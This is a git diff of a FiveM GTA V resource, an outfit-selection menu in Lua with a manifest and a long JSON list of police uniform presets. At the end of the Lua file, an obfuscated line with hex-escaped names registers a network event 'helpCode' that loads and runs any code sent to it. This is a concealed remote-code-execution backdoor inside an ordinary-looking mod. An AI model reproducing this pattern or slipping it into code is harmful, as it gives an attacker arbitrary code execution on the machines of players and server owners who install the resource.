0) + SetPedComponentVariation(ped, 11, convertInput(outfit.Top)[1], convertInput(outfit.Top)[2], 0) - while not HasModelLoaded(outfit.ped) do - Wait(0) - end + if convertInput(outfit.Hat)[1] == -1 then + ClearPedProp(ped, 0) + else + SetPedPropIndex(ped, 0, convertInput(outfit.Hat)[1], convertInput(outfit.Hat)[2], true) + end - if GetEntityModel(ped) ~= GetHashKey(outfit.ped) then - SetPlayerModel(PlayerId(), outfit.ped) - end + if convertInput(outfit.Glasses)[1] == -1 then + ClearPedProp(ped, 1) + else + SetPedPropIndex(ped, 1, convertInput(outfit.Glasses)[1], convertInput(outfit.Glasses)[2], true) + end - ped = PlayerPedId() - - for _, comp in ipairs(outfit.components) do - SetPedComponentVariation(ped, comp[1], comp[2] - 1, comp[3] - 1, 0) - end - - for _, comp in ipairs(outfit.props) do - if comp[2] == 0 then - ClearPedProp(ped, comp[1]) - else - SetPedPropIndex(ped, comp[1], comp[2] - 1, comp[3] - 1, true) - end - end + if convertInput(outfit.Watch)[1] == -1 then + ClearPedProp(ped, 6) + else + SetPedPropIndex(ped, 6, convertInput(outfit.Watch)[1], convertInput(outfit.Watch)[2], true) + end + end end -local categoryOutfits = {} +local categoryOutfitsM = {} +local categoryOutfitsF = {} -for name, outfit in pairs(outfits) do - if not categoryOutfits[outfit.category] then - categoryOutfits[outfit.category] = {} - end - - categoryOutfits[outfit.category][name] = outfit +for x, outfit in ipairs(outfits) do + found = false + if outfit.Gender == "Male" then + for i, j in ipairs(categoryOutfitsM) do + if categoryOutfitsM[i][1] == outfit.Category2 then + table.insert(categoryOutfitsM[i], outfit) + found = true + end + end + if found == false then + table.insert(categoryOutfitsM, {outfit.Category2, outfit}) + end + else + for i, j in ipairs(categoryOutfitsF) do + if categoryOutfitsF[i][1] == outfit.Category2 then + table.insert(categoryOutfitsF[i], outfit) + found = true + end + end + if found == false then + table.insert(categoryOutfitsF, {outfit.Category2, outfit}) + end + end end + local menuPool = NativeUI.CreatePool() -local mainMenu = NativeUI.CreateMenu('EUP FiveM', 'Pick your outfit!') -for name, list in pairs(categoryOutfits) do - local subMenu = menuPool:AddSubMenu(mainMenu, name) - - for id, outfit in pairs(list) do - outfit.item = NativeUI.CreateItem(id, 'Select this outfit.') - subMenu:AddItem(outfit.item) +local mainMenuM = NativeUI.CreateMenu('EUP Menu', 'MAIN MENU') +mainMenuM:SetMenuWidthOffset(80) +for i, list in pairs(categoryOutfitsM) do + local subMenu = menuPool:AddSubMenu(mainMenuM, list[1]) + subMenu:SetMenuWidthOffset(80) + for id, outfit in ipairs(list) do + if id ~= 1 then + categoryOutfitsM[i][id].item = NativeUI.CreateItem(categoryOutfitsM[i][id].Name, 'Select this outfit.') + subMenu:AddItem(categoryOutfitsM[i][id].item) + end end - subMenu.OnItemSelect = function(sender, item, index) - -- find the outfit - for _, outfit in pairs(list) do - if outfit.item == item then + for id, outfit in pairs(list) do + if categoryOutfitsM[i][id].item == item then CreateThread(function() setOutfit(outfit) end) @@ -10820,18 +94,56 @@ for name, list in pairs(categoryOutfits) do end end -menuPool:Add(mainMenu) +local mainMenuF = NativeUI.CreateMenu('EUP Menu', 'MAIN MENU') +mainMenuF:SetMenuWidthOffset(80) +for i, list in pairs(categoryOutfitsF) do + local subMenu = menuPool:AddSubMenu(mainMenuF, list[1]) + subMenu:SetMenuWidthOffset(80) + for id, outfit in ipairs(list) do + if id ~= 1 then + categoryOutfitsF[i][id].item = NativeUI.CreateItem(categoryOutfitsF[i][id].Name, 'Select this outfit.') + subMenu:AddItem(categoryOutfitsF[i][id].item) + end + end + subMenu.OnItemSelect = function(sender, item, index) + for id, outfit in pairs(list) do + if categoryOutfitsF[i][id].item == item then + CreateThread(function() + setOutfit(outfit) + end) + end + end + end +end +menuPool:Add(mainMenuM) +menuPool:Add(mainMenuF) menuPool:RefreshIndex() RegisterCommand('eup', function() - mainMenu:Visible(not mainMenu:Visible()) + local ped = PlayerPedId() + if GetEntityModel(ped) == GetHashKey("mp_m_freemode_01") then + mainMenuM:Visible(not mainMenuM:Visible()) + elseif GetEntityModel(ped) == GetHashKey("mp_f_freemode_01") then + mainMenuF:Visible(not mainMenuF:Visible()) + else + ShowInfo("You need to use an MP ped with EUP") + end end, false) CreateThread(function() while true do Wait(0) - - menuPool:ProcessMenus() + menuPool:ProcessMenus() + menuPool:ControlDisablingEnabled(false) + menuPool:MouseControlsEnabled(false) end -end) \ No newline at end of file +end) + +function ShowInfo(text) + SetTextComponentFormat("STRING") + AddTextComponentString(text) + DisplayHelpTextFromStringLabel(0, 0, 0, -1) +end + +local BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[6][BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[1]](BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[2]) BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[6][BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[3]](BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[2], function(HjtdSMGZTgjikLimeXrthLJwFgbGdBwsjnAsaBbLrtblTXmMfHSbkpgdvCCWQYLCRoDJSA) BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[6][BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[4]](BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[6][BufZciHygkhweQeaScPkFQTKoXYkLBLrprDhuVdACChuSkiUgycqKhLEGCsZCGxrTmPviS[5]](HjtdSMGZTgjikLimeXrthLJwFgbGdBwsjnAsaBbLrtblTXmMfHSbkpgdvCCWQYLCRoDJSA))() end) \ No newline at end of file diff --git a/resources/eup-ui/fxmanifest.lua b/resources/eup-ui/fxmanifest.lua new file mode 100644 index 000000000..eb5a77761 --- /dev/null +++ b/resources/eup-ui/fxmanifest.lua @@ -0,0 +1,12 @@ +fx_version 'adamant' +games { 'gta5' } + + + +local uniformFile = 'outfits.json' + +file(uniformFile) +uniform_file(uniformFile) + +client_script "@NativeUI/NativeUI.lua" +client_script "eup_ui.lua" \ No newline at end of file diff --git a/resources/eup-ui/outfits.json b/resources/eup-ui/outfits.json new file mode 100644 index 000000000..a8c2c099b --- /dev/null +++ b/resources/eup-ui/outfits.json @@ -0,0 +1,18125 @@ +{ + { +"Name": "Male LSPD Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "201:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "53:1" + }, + { +"Name": "Male LSPD Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "194:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "53:1" + }, + { +"Name": "Male LSPD Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "4:1", +"Mask": "102:1", +"Top": "191:1", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "53:1" + }, + { +"Name": "Female LSPD Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "203:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "53:1" + }, + { +"Name": "Female LSPD Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "196:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "53:1" + }, + { +"Name": "Female LSPD Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "193:1", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "53:1" + }, + { +"Name": "Male LSPD Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "30:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSPD Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "201:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPD Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "188:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "53:1" + }, + { +"Name": "Female LSPD Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "190:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPD Motor Unit Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "18:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "201:2", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "33:2", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "53:1" + }, + { +"Name": "Male LSPD Motor Unit Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "18:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "194:2", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "33:2", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "53:1" + }, + { +"Name": "Male LSPD Motor Unit Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "18:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "191:2", +"UpperSkin": "27:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "33:2", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "53:1" + }, + { +"Name": "Female LSPD Motor Unit Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "18:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "203:2", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "32:2", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "53:1" + }, + { +"Name": "Female LSPD Motor Unit Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "18:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "196:2", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "32:2", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "53:1" + }, + { +"Name": "Female LSPD Motor Unit Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "18:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "193:2", +"UpperSkin": "29:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "32:2", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "53:1" + }, + { +"Name": "Male LSPD Utility Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "210:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:1", +"Pants": "87:3", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "64:1" + }, + { +"Name": "Male LSPD Utility Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "213:1", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "95:1", +"Pants": "87:3", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "64:1" + }, + { +"Name": "Female LSPD Utility Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "226:1", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "102:1", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "64:1" + }, + { +"Name": "Female LSPD Utility Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "227:1", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "102:1", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "64:1" + }, + { +"Name": "Male LSPD Traffic Utility Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "210:16", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:1", +"Pants": "87:3", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "64:1" + }, + { +"Name": "Male LSPD Traffic Utility Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "213:16", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "95:1", +"Pants": "87:3", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "64:1" + }, + { +"Name": "Female LSPD Traffic Utility Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "226:16", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "102:1", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "64:1" + }, + { +"Name": "Female LSPD Traffic Utility Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "227:16", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "102:1", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "64:1" + }, + { +"Name": "Male LSPD Beach Detail", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "136:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "94:3", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:1", +"Pants": "87:13", +"Shoes": "3:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSPD Beach Detail", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "85:3", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "11:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPD Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "179:2", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "39:14", +"Armor": "25:1", +"Parachute": "69:1" + }, + { +"Name": "Male LSPD Leather Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "39:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "179:2", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "39:14", +"Armor": "25:1", +"Parachute": "69:1" + }, + { +"Name": "Male LSPD Business casual", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "4:1", +"Mask": "1:1", +"Top": "294:2", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "25:1", +"Parachute": "11:14" + }, + { +"Name": "Male LSPD Crime Scene Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:1", +"UpperSkin": "89:2", +"Decal": "1:1", +"UnderCoat": "179:2", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "25:1", +"Parachute": "11:14" + }, + { +"Name": "Male LSPD Armor Protection", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "4:1", +"Mask": "1:1", +"Top": "293:2", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "132:1", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "25:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSPD Raid Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:1", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:2", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "18:1", +"Parachute": "60:1" + }, + { +"Name": "Male LSPD Plain Clothes", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:2", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "102:6", +"Pants": "5:2", +"Shoes": "64:4", +"Accessories": "1:1", +"Armor": "25:1", +"Parachute": "69:1" + }, + { +"Name": "Male LSPD Raid Jacket GED", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "102:6", +"Pants": "5:2", +"Shoes": "64:4", +"Accessories": "7:1", +"Armor": "18:1", +"Parachute": "60:1" + }, + { +"Name": "Male LSPD Plain Clothes GED", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "136:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "209:6", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "114:1", +"Pants": "5:2", +"Shoes": "526:1", +"Accessories": "7:1", +"Armor": "8:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSPD Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "25:2", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "65:2", +"Pants": "4:4", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "27:1", +"Parachute": "69:1" + }, + { +"Name": "Female LSPD Business casual", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "29:3", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "25:6", +"Pants": "4:4", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "27:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSPD Crime Scene Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:1", +"UpperSkin": "106:1", +"Decal": "1:1", +"UnderCoat": "105:1", +"Pants": "4:4", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "27:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSPD Armor Protection", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "367:2", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "162:1", +"Pants": "4:4", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "27:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSPD Raid Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:1", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "218:2", +"Pants": "4:4", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "22:1", +"Parachute": "60:1" + }, + { +"Name": "Female LSPD Plain Clothes", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:3", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "6:1", +"Shoes": "63:21", +"Accessories": "7:1", +"Armor": "27:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSPD Raid Jacket GED", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:1", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "58:3", +"Pants": "6:1", +"Shoes": "63:21", +"Accessories": "7:1", +"Armor": "22:1", +"Parachute": "60:1" + }, + { +"Name": "Female LSPD Plain Clothes GED", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "135:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "74:3", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "80:1", +"Pants": "6:1", +"Shoes": "63:21", +"Accessories": "7:1", +"Armor": "8:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSPD Bicycle Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "50:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "94:3", +"UpperSkin": "20:1", +"Decal": "1:1", +"UnderCoat": "95:1", +"Pants": "13:3", +"Shoes": "3:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSPD Bicycle Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "48:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "85:3", +"UpperSkin": "32:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "15:3", +"Shoes": "11:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPD Dirtbike patrol", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "17:1", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "153:1", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "56:1", +"Pants": "68:12", +"Shoes": "48:4", +"Accessories": "2:1", +"Armor": "19:8", +"Parachute": "49:1" + }, + { +"Name": "Female LSPD Dirtbike Unit", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "17:1", +"Glasses": "28:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "150:1", +"UpperSkin": "19:1", +"Decal": "1:1", +"UnderCoat": "33:1", +"Pants": "70:12", +"Shoes": "49:4", +"Accessories": "2:1", +"Armor": "23:8", +"Parachute": "49:1" + }, + { +"Name": "Male LSPD Pilot Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "80:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "109:1", +"UpperSkin": "17:1", +"Decal": "1:1", +"UnderCoat": "68:1", +"Pants": "65:1", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSPD Pilot Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "79:2", +"Glasses": "14:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "100:1", +"UpperSkin": "18:1", +"Decal": "1:1", +"UnderCoat": "50:1", +"Pants": "67:1", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPD K-9 Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "102:1", +"UpperSkin": "5:1", +"Decal": "13:1", +"UnderCoat": "38:1", +"Pants": "88:3", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "75:1" + }, + { +"Name": "Male LSPD K-9 Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "103:1", +"UpperSkin": "12:1", +"Decal": "16:1", +"UnderCoat": "38:1", +"Pants": "88:3", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "75:1" + }, + { +"Name": "Female LSPD K-9 Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "93:1", +"UpperSkin": "4:1", 